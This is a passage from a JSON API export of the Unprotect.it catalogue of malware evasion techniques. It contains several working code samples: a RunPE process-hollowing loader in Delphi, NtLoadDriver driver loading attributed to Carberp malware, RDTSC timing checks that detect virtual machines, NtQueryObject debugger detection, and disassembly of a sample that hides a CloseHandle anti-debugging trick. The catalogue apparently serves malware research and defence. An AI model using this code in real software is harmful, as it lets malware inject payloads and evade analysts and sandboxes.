"id": 9,
"name": "Lexsek",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/Lexsek_",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/216/?format=api",
"description": "The malicious sample listed below abused variant bytes of __IsNonwritableInCurrentImage signature to add two instructions consisting of an anti-debugging technique referenced as [U0114](https://unprotect.it/technique/closehandle-ntclose/) on Unprotect.\r\n\r\nSha256 : a41ba65405a032f4450ba80882cdd01d715d9d1684f4204050566be29a6dedb0",
"plain_code": "// Malicious code\r\n.text:00A4264A push 0DEADBEEFh\r\n.text:00A4264F call kernel32_CloseHandle\r\n\r\n//Full abused function tagged as __IsNonwritableInCurrentImage.\r\n.text:00A42610 __IsNonwritableInCurrentImage proc near ; CODE XREF: sub_A428D0:loc_A429E2↓p\r\n.text:00A42610\r\n.text:00A42610 ms_exc = CPPEH_RECORD ptr -18h\r\n.text:00A42610\r\n.text:00A42610 ; __unwind { // __except_handler4\r\n.text:00A42610 push ebp\r\n.text:00A42611 mov ebp, esp\r\n.text:00A42613 push 0FFFFFFFEh\r\n.text:00A42615 push offset stru_A5AE98\r\n.text:00A4261A push offset __except_handler4\r\n.text:00A4261F mov eax, large fs:0\r\n.text:00A42625 push eax\r\n.text:00A42626 sub esp, 8\r\n.text:00A42629 push ebx\r\n.text:00A4262A push esi\r\n.text:00A4262B push edi\r\n.text:00A4262C mov eax, ___security_cookie\r\n.text:00A42631 xor [ebp+ms_exc.registration.ScopeTable], eax\r\n.text:00A42634 xor eax, ebp\r\n.text:00A42636 push eax\r\n.text:00A42637 lea eax, [ebp+ms_exc.registration]\r\n.text:00A4263A mov large fs:0, eax\r\n.text:00A42640 mov [ebp+ms_exc.old_esp], esp\r\n.text:00A42643 ; __try { // __except at loc_A42676\r\n.text:00A42643 mov [ebp+ms_exc.registration.TryLevel], 0\r\n.text:00A4264A push 0DEADBEEFh\r\n.text:00A4264F call kernel32_CloseHandle\r\n.text:00A4264F ; } // starts at A42643\r\n.text:00A42655 mov [ebp+ms_exc.registration.TryLevel], 0FFFFFFFEh\r\n.text:00A4265C xor eax, eax\r\n.text:00A4265E mov ecx, [ebp+ms_exc.registration.Next]\r\n.text:00A42661 mov large fs:0, ecx\r\n.text:00A42668 pop ecx\r\n.text:00A42669 pop edi\r\n.text:00A4266A pop esi\r\n.text:00A4266B pop ebx\r\n.text:00A4266C mov esp, ebp\r\n.text:00A4266E pop ebp\r\n.text:00A4266F retn\r\n.text:00A42670 ; ---------------------------------------------------------------------------\r\n.text:00A42670\r\n.text:00A42670 loc_A42670: ; DATA XREF: .rdata:stru_A5AE98↓o\r\n.text:00A42670 ; __except filter // owned by A42643\r\n.text:00A42670 mov eax, 1\r\n.text:00A42675 retn\r\n.text:00A42676 ; ---------------------------------------------------------------------------\r\n.text:00A42676\r\n.text:00A42676 loc_A42676: ; DATA XREF: .rdata:stru_A5AE98↓o\r\n.text:00A42676 ; __except(loc_A42670) // owned by A42643\r\n.text:00A42676 mov esp, [ebp+ms_exc.old_esp]\r\n.text:00A42679 mov [ebp+ms_exc.registration.TryLevel], 0FFFFFFFEh\r\n.text:00A42680 mov eax, 2000h\r\n.text:00A42685 mov ecx, [ebp+ms_exc.registration.Next]\r\n.text:00A42688 mov large fs:0, ecx\r\n.text:00A4268F pop ecx\r\n.text:00A42690 pop edi\r\n.text:00A42691 pop esi\r\n.text:00A42692 pop ebx\r\n.text:00A42693 mov esp, ebp\r\n.text:00A42695 pop ebp\r\n.text:00A42696 retn\r\n.text:00A42696 ; } // starts at A42610\r\n.text:00A42696 __IsNonwritableInCurrentImage endp"
},
{
"id": 114,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 16,
"name": "External",
"email": null,
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/215/?format=api",
"description": "NtLoadDriver technique used by Caberp malware.",
"plain_code": "VOID StartSys(LPCSTR chSysPath)\r\n{\r\n\tNTSTATUS St;\r\n\tBOOL bRet = FALSE;\r\n\tHKEY hKey;\r\n\tCHAR chRegPath[MAX_PATH];\r\n\tWCHAR wcLoadDrv[MAX_PATH];\r\n\tCHAR chImagePath[MAX_PATH] = \"\\\\??\\\\\";\r\n\tUNICODE_STRING usStr;\r\n\tDWORD dwType;\r\n\r\n\tGetPrivilege(SE_LOAD_DRIVER_PRIVILEGE);\r\n\r\n\tDbgPrint(__FUNCTION__\"(): driver path '%s'\\n\",chSysPath);\r\n\r\n\tDWORD dwId = GetTickCount();\r\n\r\n\t_snprintf(chRegPath,RTL_NUMBER_OF(chRegPath)-1,\"system\\\\currentcontrolset\\\\services\\\\%x\", dwId);\r\n\t_snwprintf(wcLoadDrv,RTL_NUMBER_OF(wcLoadDrv)-1,L\"\\\\registry\\\\machine\\\\system\\\\currentcontrolset\\\\services\\\\%x\", dwId);\r\n\r\n\tstrncat(chImagePath,chSysPath,sizeof(chImagePath));\r\n\tif (RegCreateKey(HKEY_LOCAL_MACHINE,chRegPath,&hKey) == ERROR_SUCCESS)\r\n\t{\r\n\t\tRegSetValueEx(hKey,\"ImagePath\",0,REG_SZ,(LPBYTE)&chImagePath,strlen(chImagePath)+1);\r\n\r\n\t\tdwType = SERVICE_KERNEL_DRIVER;\r\n\t\tRegSetValueEx(hKey,\"Type\",0,REG_DWORD,(LPBYTE)&dwType,sizeof(DWORD));\r\n\r\n\t\tdwType = SERVICE_DEMAND_START;\r\n\t\tRegSetValueEx(hKey,\"Start\",0,REG_DWORD,(LPBYTE)&dwType,sizeof(DWORD));\r\n\r\n\t\tRegCloseKey(hKey);\r\n\r\n\t\tRtlInitUnicodeString(&usStr,wcLoadDrv);\r\n\t\tSt = NtLoadDriver(&usStr);\r\n\r\n\t\tDbgPrint(__FUNCTION__\"(): NtLoadDriver status %x\\n\",St);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tDbgPrint(__FUNCTION__\"(): RegCreateKey last error %x\\n\",GetLastError());\r\n\t}\r\n}"
},
{
"id": 113,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"author": {
"id": 1,
"name": "Jean-Pierre LESUEUR",
"email": "jplesueur@phrozen.io",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/88/?format=api",
"description": "Supports both x86-32 / x86-64\r\n\r\nThe RunPE loader must have the same architecture as `PE Payload` and `PE Host`. `PE Payload` and `PE Host` must of course have the same architecture.",
"plain_code": "// Supports both x86-32 and x86-64\r\n\r\nprogram Unprotect_RunPE;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n System.Classes,\r\n WinAPI.Windows,\r\n System.SysUtils;\r\n\r\n\r\nfunction NtUnmapViewOfSection(\r\n ProcessHandle: THandle;\r\n BaseAddress: Pointer\r\n):DWORD; stdcall; external 'ntdll.dll';\r\n\r\ntype\r\n EWindowsException = class(Exception)\r\n private\r\n FLastError : Integer;\r\n public\r\n {@C}\r\n constructor Create(const WinAPI : String); overload;\r\n\r\n {@G}\r\n property LastError : Integer read FLastError;\r\n end;\r\n\r\n EInvalidPEFile = class(Exception)\r\n public\r\n {@C}\r\n constructor Create(const AReason : String); overload;\r\n end;\r\n\r\nconstructor EWindowsException.Create(const WinAPI : String);\r\nvar AFormatedMessage : String;\r\nbegin\r\n FLastError := GetLastError();\r\n\r\n AFormatedMessage := Format('___%s: last_err=%d, last_err_msg=\"%s\".', [\r\n WinAPI,\r\n FLastError,\r\n SysErrorMessage(FLastError)\r\n ]);\r\n\r\n ///\r\n inherited Create(AFormatedMessage);\r\nend;\r\n\r\n\r\nconstructor EInvalidPEFile.Create(const AReason : String);\r\nbegin\r\n inherited Create(Format('Invalid Windows PE File: \"%s\"', [AReason]));\r\nend;\r\n\r\nprocedure WriteProcessMemoryEx(const hProcess : THandle; const pOffset, pData : Pointer; const ADataSize : SIZE_T);\r\nvar ABytesWritten : SIZE_T;\r\nbegin\r\n if not WriteProcessMemory(\r\n hProcess,\r\n pOffset,\r\n pData,\r\n ADataSize,\r\n ABytesWritten\r\n ) then\r\n raise EWindowsException.Create('WriteProcessMemory');\r\nend;\r\n\r\nprocedure HollowMe(const pPEBuffer: PVOID; const APEBufferSize: Int64; APEHost : String); overload;\r\nvar AStartupInfo : TStartupInfo;\r\n AProcessInfo : TProcessInformation;\r\n pThreadContext : PContext;\r\n AImageBase : NativeUInt;\r\n pOffset : Pointer;\r\n ABytesRead : SIZE_T;\r\n ptrImageDosHeader : PImageDosHeader;\r\n AImageNtHeaderSignature : DWORD;\r\n ptrImageFileHeader : PImageFileHeader;\r\n I : Integer;\r\n pSectionHeader : PImageSectionHeader;\r\n pPayloadAddress : Pointer;\r\n pImageBaseOffset : Pointer;\r\n ALoaderX64 : Boolean;\r\n\r\n {$IFDEF WIN64}\r\n pOptionalHeader64 : PImageOptionalHeader64;\r\n {$ELSE}\r\n pOptionalHeader32 : PImageOptionalHeader32;\r\n {$ENDIF}\r\n\r\nbegin\r\n if (not Assigned(pPEBuffer)) or (APEBufferSize = 0) then\r\n raise Exception.Create('Memory buffer is not valid.');\r\n\r\n pOffset := pPEBuffer;\r\n\r\n ptrImageDosHeader := PImageDosHeader(pOffset);\r\n\r\n if ptrImageDosHeader^.e_magic <> IMAGE_DOS_SIGNATURE then\r\n raise EInvalidPEFile.Create('IMAGE_DOS_SIGNATURE');\r\n\r\n pOffset := Pointer(NativeUInt(pOffset) + ptrImageDosHeader^._lfanew);\r\n\r\n AImageNtHeaderSignature := PDWORD(pOffset)^;\r\n\r\n if AImageNtHeaderSignature <> IMAGE_NT_SIGNATURE then\r\n raise EInvalidPEFile.Create('IMAGE_NT_SIGNATURE');\r\n\r\n pOffset := Pointer(NativeUInt(pOffset) + SizeOf(DWORD));\r\n\r\n ptrImageFileHeader := PImageFileHeader(pOffset);\r\n\r\n {$IFDEF WIN64}\r\n ALoaderX64 := True;\r\n {$ELSE}\r\n ALoaderX64 := False;\r\n {$ENDIF}\r\n\r\n case ptrImageFileHeader^.Machine of\r\n IMAGE_FILE_MACHINE_AMD64 : begin\r\n if not ALoaderX64 then\r\n Exception.Create('Cannot load X86-64 PE file from a X86-32 Loader.');\r\n end;\r\n\r\n IMAGE_FILE_MACHINE_I386 : begin\r\n if ALoaderX64 then\r\n Exception.Create('Cannot load X86-32 PE file from a X86-64 Loader.');\r\n end;\r\n end;\r\n\r\n pOffset := Pointer(NativeUInt(pOffset) + SizeOf(TImageFileHeader));\r\n\r\n {$IFDEF WIN64}\r\n pOptionalHeader64 := PImageOptionalHeader64(pOffset);\r\n\r\n pOffset := Pointer(NativeUInt(pOffset) + SizeOf(TImageOptionalHeader64));\r\n {$ELSE}\r\n pOptionalHeader32 := PImageOptionalHeader32(pOffset);\r\n\r\n pOffset := Pointer(NativeUInt(pOffset) + SizeOf(TImageOptionalHeader32));\r\n {$ENDIF}\r\n\r\n pSectionHeader := PImageSectionHeader(pOffset);\r\n\r\n ZeroMemory(@AStartupInfo, SizeOf(TStartupInfo));\r\n ZeroMemory(@AProcessInfo, SizeOf(TProcessInformation));\r\n\r\n AStartupInfo.cb := SizeOf(TStartupInfo);\r\n AStartupInfo.wShowWindow := SW_SHOW;\r\n\r\n UniqueString(APEHost);\r\n\r\n if not CreateProcessW(\r\n PWideChar(APEHost),\r\n nil,\r\n nil,\r\n nil,\r\n False,\r\n CREATE_SUSPENDED,\r\n nil,\r\n nil,\r\n AStartupInfo,\r\n AProcessInfo\r\n ) then\r\n raise EWindowsException.Create('CreateProcessW');\r\n\r\n pThreadContext := VirtualAlloc(nil, SizeOf(TContext), MEM_COMMIT, PAGE_READWRITE);\r\n pThreadContext^.ContextFlags := CONTEXT_FULL;\r\n\r\n if not GetThreadContext(AProcessInfo.hThread, pThreadContext^) then\r\n raise EWindowsException.Create('GetThreadContext');\r\n\r\n {$IFDEF WIN64}\r\n pImageBaseOffset := Pointer(pThreadContext^.Rdx + (SizeOf(Pointer) * 2));\r\n {$ELSE}\r\n pImageBaseOffset := Pointer(pThreadContext^.Ebx + (SizeOf(Pointer) * 2));\r\n {$ENDIF}\r\n\r\n if not ReadProcessMemory(AProcessInfo.hProcess, pImageBaseOffset, @AImageBase, SizeOf(NativeUInt), ABytesRead) then\r\n raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n if NtUnmapViewOfSection(AProcessInfo.hProcess, Pointer(AImageBase)) <> 0 then\r\n raise Exception.Create('Could not unmap section.');\r\n\r\n pPayloadAddress := VirtualAllocEx(\r\n AProcessInfo.hProcess,\r\n nil,\r\n {$IFDEF WIN64}\r\n pOptionalHeader64^.SizeOfImage,\r\n {$ELSE}\r\n pOptionalHeader32^.SizeOfImage,\r\n {$ENDIF}\r\n MEM_COMMIT or MEM_RESERVE,\r\n PAGE_EXECUTE_READWRITE\r\n );\r\n\r\n if not Assigned(pPayloadAddress) then\r\n raise EWindowsException.Create('VirtualAllocEx');\r\n\r\n WriteProcessMemoryEx(\r\n AProcessInfo.hProcess,\r\n pPayloadAddress,\r\n pPEBuffer,\r\n {$IFDEF WIN64}\r\n pOptionalHeader64^.SizeOfHeaders\r\n {$ELSE}\r\n pOptionalHeader32^.SizeOfHeaders\r\n {$ENDIF}\r\n );\r\n\r\n for I := 1 to ptrImageFileHeader^.NumberOfSections do begin\r\n try\r\n WriteProcessMemoryEx(\r\n AProcessInfo.hProcess,\r\n Pointer(NativeUInt(pPayloadAddress) + pSectionHeader^.VirtualAddress),\r\n Pointer(NativeUInt(pPEBuffer) + pSectionHeader^.PointerToRawData),\r\n pSectionHeader^.SizeOfRawData\r\n );\r\n finally\r\n pSectionHeader := Pointer(NativeUInt(pSectionHeader) + SizeOf(TImageSectionHeader));\r\n end;\r\n end;\r\n\r\n {$IFDEF WIN64}\r\n pThreadContext^.Rcx := NativeUInt(pPayloadAddress) + pOptionalHeader64^.AddressOfEntryPoint;\r\n {$ELSE}\r\n pThreadContext^.Eax := NativeUInt(pPayloadAddress) + pOptionalHeader32^.AddressOfEntryPoint;\r\n {$ENDIF}\r\n\r\n WriteProcessMemoryEx(\r\n AProcessInfo.hProcess,\r\n pImageBaseOffset,\r\n @pPayloadAddress,\r\n SizeOf(Pointer)\r\n );\r\n\r\n if not SetThreadContext(AProcessInfo.hThread, pThreadContext^) then\r\n raise EWindowsException.Create('SetThreadContext');\r\n\r\n if ResumeThread(AProcessInfo.hThread) = 0 then\r\n raise EWindowsException.Create('ResumeThread');\r\nend;\r\n\r\n\r\nprocedure HollowMe(const APEFile, APEHost : String); overload;\r\nvar ABuffer : array of byte;\r\n hFile : THandle;\r\n AFileSize : Int64;\r\n ABytesRead : DWORD;\r\nbegin\r\n if not FileExists(APEFile) then\r\n raise Exception.Create(Format('File \"%s\" does not exists.', [APEFile]));\r\n ///\r\n\r\n hFile := CreateFile(\r\n PWideChar(APEFile),\r\n GENERIC_READ,\r\n FILE_SHARE_READ,\r\n nil,\r\n OPEN_EXISTING,\r\n 0,\r\n 0\r\n );\r\n if hFile = INVALID_HANDLE_VALUE then\r\n raise EWindowsException.Create('CreateFile');\r\n\r\n try\r\n if not GetFileSizeEx(hFile, AFileSize) then\r\n raise EWindowsException.Create('GetFileSizeEx');\r\n\r\n if AFileSize = 0 then\r\n raise Exception.Create('Invalid PE File Size.');\r\n\r\n SetLength(ABuffer, AFileSize);\r\n\r\n if not ReadFile(hFile, ABuffer[0], AFileSize, ABytesRead, nil) then\r\n raise EWindowsException.Create('ReadFile');\r\n finally\r\n CloseHandle(hFile);\r\n end;\r\n\r\n ///\r\n HollowMe(PByte(ABuffer), AFileSize, APEHost);\r\nend;\r\n\r\nbegin\r\n try\r\n HollowMe('FileToRun.exe', 'HostFile.exe');\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
},
{
"id": 112,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 16,
"name": "External",
"email": null,
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/64/?format=api",
"description": "Original source code available here: https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/TimingAttacks/timing.cpp",
"plain_code": "/*\r\nRDSTC is a famous x86 instruction to count the number of cycle since reset.\r\nThis can be used to detect the VM. Thanks to Forcepoint for blog article.\r\n*/\r\n\r\n#define LODWORD(_qw) ((DWORD)(_qw))\r\nBOOL rdtsc_diff_locky()\r\n{\r\n\tULONGLONG tsc1;\r\n\tULONGLONG tsc2;\r\n\tULONGLONG tsc3;\r\n\tDWORD i = 0;\r\n\r\n\t// Try this 10 times in case of small fluctuations\r\n\tfor (i = 0; i < 10; i++)\r\n\t{\r\n\t\ttsc1 = __rdtsc();\r\n\r\n\t\t// Waste some cycles - should be faster than CloseHandle on bare metal\r\n\t\tGetProcessHeap();\r\n\r\n\t\ttsc2 = __rdtsc();\r\n\r\n\t\t// Waste some cycles - slightly longer than GetProcessHeap() on bare metal\r\n\t\tCloseHandle(0);\r\n\r\n\t\ttsc3 = __rdtsc();\r\n\r\n\t\t// Did it take at least 10 times more CPU cycles to perform CloseHandle than it took to perform GetProcessHeap()?\r\n\t\tif ((LODWORD(tsc3) - LODWORD(tsc2)) / (LODWORD(tsc2) - LODWORD(tsc1)) >= 10)\r\n\t\t\treturn FALSE;\r\n\t}\r\n\r\n\t// We consistently saw a small ratio of difference between GetProcessHeap and CloseHandle execution times\r\n\t// so we're probably in a VM!\r\n\treturn TRUE;\r\n}"
},
{
"id": 111,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 16,
"name": "External",
"email": null,
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/56/?format=api",
"description": "Original source code available here: https://gist.github.com/soxfmr/16c495d6e4ad99e9e46f5bfd558d152f",
"plain_code": "/**\r\nAnti-Debugging in NtQueryObject - ObjectAllTypesInformation\r\nCopyright (C) 2018 soxfmr@foxmail.com\r\n\r\nThis program is free software: you can redistribute it and/or modify\r\nit under the terms of the GNU General Public License as published by\r\nthe Free Software Foundation, either version 3 of the License, or\r\n(at your option) any later version.\r\n\r\nThis program is distributed in the hope that it will be useful,\r\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\r\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\nGNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License\r\nalong with this program. If not, see <https://www.gnu.org/licenses/>.\r\n*/\r\n#include <tchar.h>\r\n#include <Windows.h>\r\n\r\n#define DEBUG_OBJECT_NAME L\"DebugObject\"\r\n\r\ntypedef struct _UNICODE_STRING {\r\n\tUSHORT Length;\r\n\tUSHORT MaximumLength;\r\n\tPWSTR Buffer;\r\n} UNICODE_STRING;\r\n\r\ntypedef enum _OBJECT_INFORMATION_CLASS {\r\n ObjectBasicInformation = 0,\r\n ObjectNameInformation = 1,\r\n ObjectTypeInformation = 2,\r\n ObjectAllTypesInformation = 3,\r\n ObjectHandleInformation = 4\r\n} OBJECT_INFORMATION_CLASS;\r\n\r\n\r\n/**\r\n* The following structure contains partial members of the entire data structure\r\n* As the public documentation shown, the TotalNumberOfObjects should follows by\r\n* TotalNumberOfHandles instead of in reverseing order (Represent in code snippet of book <<逆向工程核心原理>>)\r\n* For the completely structure information: https://doxygen.reactos.org/d6/d07/struct__OBJECT__TYPE__INFORMATION.html\r\n*/\r\ntypedef struct _OBJECT_TYPE_INFORMATION {\r\n\tUNICODE_STRING TypeName;\r\n\tULONG TotalNumberOfObjects;\r\n\tULONG TotalNumberOfHandles;\r\n} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;\r\n\r\ntypedef struct _OBJECT_ALL_TYPES_INFORMATION {\r\n\tULONG NumberOfObjectTypes;\r\n\tOBJECT_TYPE_INFORMATION ObjectTypeInformation[1];\r\n} OBJECT_ALL_TYPES_INFORMATION, *POBJECT_ALL_TYPES_INFORMATION;\r\n\r\ntypedef NTSTATUS (NTAPI *PNTQUERYOBJECT)(\r\n\tHANDLE Handle,\r\n\tOBJECT_INFORMATION_CLASS ObjectInformationClass,\r\n\tPVOID ObjectInformation,\r\n\tULONG ObjectInformationLength,\r\n\tPULONG ReturnLength\r\n);\r\n\r\nVOID WriteLog(TCHAR* lpMessage)\r\n{\r\n\tHANDLE hOutput = GetStdHandle(STD_OUTPUT_HANDLE);\r\n\tWriteConsole(hOutput, lpMessage, _tcslen(lpMessage), NULL, NULL);\r\n}\r\n\r\n/**\r\n* If you were compile the program in Debug mode, you must disable the RTC runtime check option (/RTCu)\r\n* Otherwise the RTC runtime function will be call at the end of this function and overwrite the return value of `eax`\r\n*/\r\nBOOL NtQueryObjectDebuggerDetect()\r\n{\r\n\tULONG i = 0;\r\n\tBOOL bRet = FALSE;\r\n\r\n\tPNTQUERYOBJECT pNtQueryObject = NULL;\r\n\tPOBJECT_TYPE_INFORMATION pObjectTypeInfo = NULL;\r\n\tPOBJECT_ALL_TYPES_INFORMATION pObjectAllTypesInfo = NULL;\r\n\t\r\n\tUCHAR *pNextTypeLocation = NULL;\r\n\tUCHAR *pObjectTypeLocation = NULL;\r\n\t\r\n\tULONG dwObjAllTypesLen = 0;\r\n\tPVOID pObjectAllTypesBuffer = NULL;\r\n\r\n\tpNtQueryObject = (PNTQUERYOBJECT) GetProcAddress(GetModuleHandle(L\"ntdll.dll\"), \r\n\t\t\"NtQueryObject\");\r\n\tif (pNtQueryObject == NULL)\r\n\t{\r\n\t\tWriteLog(L\"Cannot obtain the address of NtQueryObject\\n\");\r\n\t\treturn bRet;\r\n\t}\r\n\r\n\tpNtQueryObject(NULL, ObjectAllTypesInformation, &dwObjAllTypesLen, sizeof(dwObjAllTypesLen), &dwObjAllTypesLen);\r\n\r\n\tpObjectAllTypesBuffer = VirtualAlloc(NULL, dwObjAllTypesLen, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); \r\n\tif (0 != pNtQueryObject((HANDLE) -1, ObjectAllTypesInformation, pObjectAllTypesBuffer, dwObjAllTypesLen, NULL))\r\n\t{\r\n\t\tWriteLog(L\"Cannot obtain the object of all types info\\n\");\r\n\t\tgoto release;\r\n\t}\r\n\r\n\tpObjectAllTypesInfo = (POBJECT_ALL_TYPES_INFORMATION) pObjectAllTypesBuffer;\r\n\tpObjectTypeLocation = (UCHAR*) pObjectAllTypesInfo->ObjectTypeInformation;\r\n\r\n\tfor (i = 0; i < pObjectAllTypesInfo->NumberOfObjectTypes; i++)\r\n\t{\r\n\t\tpObjectTypeInfo = (POBJECT_TYPE_INFORMATION) pObjectTypeLocation;\r\n\t\tif (wcscmp(DEBUG_OBJECT_NAME, pObjectTypeInfo->TypeName.Buffer) == 0)\r\n\t\t{\r\n\t\t\tbRet = pObjectTypeInfo->TotalNumberOfObjects > 0 ? TRUE : FALSE;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\t\r\n\t\t// This make me confuse a bit, but seems the Buffer is locate at the end\r\n\t\t// of OBJECT_TYPE_INFORMATION object (I guess :) )\r\n\t\tpObjectTypeLocation = (UCHAR*) pObjectTypeInfo->TypeName.Buffer;\r\n\t\tpObjectTypeLocation += pObjectTypeInfo->TypeName.MaximumLength;\r\n\t\t// Address align, 0xFFFFFFFC on x86, and 0xFFFFFFFFFFFFFFF8 for AMD64\r\n\t\tpNextTypeLocation = (UCHAR*) ((ULONG) pObjectTypeLocation & -sizeof(void*));\r\n\t\t// If the alignment operation reduce the address which is lesser than \r\n\t\t// the desire size of the buffer, then we should add the alignment size to it\r\n\t\tif (pNextTypeLocation < pObjectTypeLocation)\r\n\t\t\tpNextTypeLocation += sizeof(ULONG);\r\n\r\n\t\tpObjectTypeLocation = pNextTypeLocation;\r\n\t}\r\n\r\nrelease:\r\n\t\r\n\tif (pObjectAllTypesBuffer != NULL)\r\n\t{\r\n\t\tVirtualFree(pObjectAllTypesBuffer, 0, MEM_RELEASE);\r\n\t}\r\n\r\n\treturn bRet;\r\n}\r\n\r\nint main()\r\n{\r\n\tif (NtQueryObjectDebuggerDetect())\r\n\t{\r\n\t\tWriteLog(L\"[-] Debugger Detected!\\n\");\r\n\t} else \r\n\t{\r\n\t\tWriteLog(L\"[+] Pass!\\n\");\r\n\t}\r\n\t\r\n\tsystem(\"pause\");\r\n\r\n\treturn 0;\r\n}"
}
]
}
